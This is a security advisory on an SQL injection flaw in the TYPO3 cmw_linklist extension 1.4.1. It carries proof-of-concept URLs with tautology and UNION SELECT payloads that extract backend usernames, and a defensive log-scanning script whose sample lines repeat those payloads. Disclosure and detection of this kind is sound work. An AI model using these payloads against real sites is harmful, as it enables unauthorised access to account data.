Typo3 CMW_Linklist Extension SQL Injection Vulnerability
BID:12721
Info
| Bugtraq ID: | 12721 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 03 2005 12:00AM |
| Updated: | Mar 03 2005 12:00AM |
| Credit: | Discovery of this vulnerability is credited to Fabian Becker. |
| Vulnerable: | Sebastian Faulhaber cmw_linklist 1.4.1 |
| Not Vulnerable: | Sebastian Faulhaber cmw_linklist 1.5.0 |
Discussion
Typo3 'cmw_linklist' extension is affected by a remote SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in a SQL query.
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
This issue is reported to affect 'cmw_linklist' extension versions 1.4.1 and earlier.
Exploit / POC
No exploit is required.
The following proof of concept is available:
http://www.example.com/[LinksSection]?&no_cache=1&action=getviewcategory&category_uid=1%20or%201=1
Gulftech Security Research has supplied the following additional proofs of concept:
A test for vulnerability:
http://www.example.com/[path]/?&action=getviewcategory&category_uid=-99%20UNION%20SELECT%20username%20FROM%20be_users%20WHERE%20uid=1/*
Lists user names and categories:
http://www.example.com/[path]/?&action=getviewcategory&category_uid=-99%20UNION%20SELECT%20username,null%20FROM%20be_users%20WHERE%201/*
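For defenders checking whether a site running an affected version received requests of this shape, the following added example (not part of the original advisory or the extension's code) scans web server access-log lines and reports any request whose decoded 'category_uid' value is not a plain integer. It assumes 'category_uid' is normally a non-negative integer and that logs are in the common combined format; the sample log lines, client addresses and paths are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in combined log format; addresses and paths are made up.
SAMPLE_LOG = [
    '192.0.2.10 - - [03/Mar/2005:10:00:01 +0000] "GET /links/?&action=getviewcategory&category_uid=7 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [03/Mar/2005:10:02:13 +0000] "GET /links/?&no_cache=1&action=getviewcategory&category_uid=1%20or%201=1 HTTP/1.1" 200 20480',
    '198.51.100.7 - - [03/Mar/2005:10:05:40 +0000] "GET /links/?&action=getviewcategory&category_uid=-99%20UNION%20SELECT%20username%20FROM%20be_users%20WHERE%20uid=1/* HTTP/1.1" 200 812',
    '192.0.2.10 - - [03/Mar/2005:10:06:02 +0000] "GET /index.php?id=12 HTTP/1.1" 200 3301',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate category_uid is a non-negative decimal integer.
INTEGER_RE = re.compile(r"[0-9]+")


def suspicious_category_uid(log_line):
    """Return the URL-decoded category_uid if it is not a plain integer, else None."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    # parse_qs percent-decodes values and splits each pair on the first '=' only,
    # so "1%20or%201=1" is recovered as the single value "1 or 1=1".
    params = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
    for value in params.get("category_uid", []):
        if not INTEGER_RE.fullmatch(value):
            return value
    return None


def scan(lines):
    """Return (client_address, decoded_value) for every flagged request."""
    hits = []
    for line in lines:
        value = suspicious_category_uid(line)
        if value is not None:
            hits.append((line.split()[0], value))
    return hits


if __name__ == "__main__":
    for client, value in scan(SAMPLE_LOG):
        print(f"{client}: non-integer category_uid {value!r}")
```

The same integer-only rule is the server-side mitigation for installations that cannot upgrade immediately: reject or integer-cast 'category_uid' before it reaches the query.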
Solution / Fix
Solution:
An upgrade to the 'cmw_linklist' extension has been made available:
Sebastian Faulhaber cmw_linklist 1.4.1
- Typo3 cmw_linklist 1.5.0
  http://typo3.org/extensions/repository/search/cmw_linklist/details/
References
References:
- Synnefoims Homepage (synnefoims)
- TYPO3 SQL Injection vunerabilitie (Fabian Becker)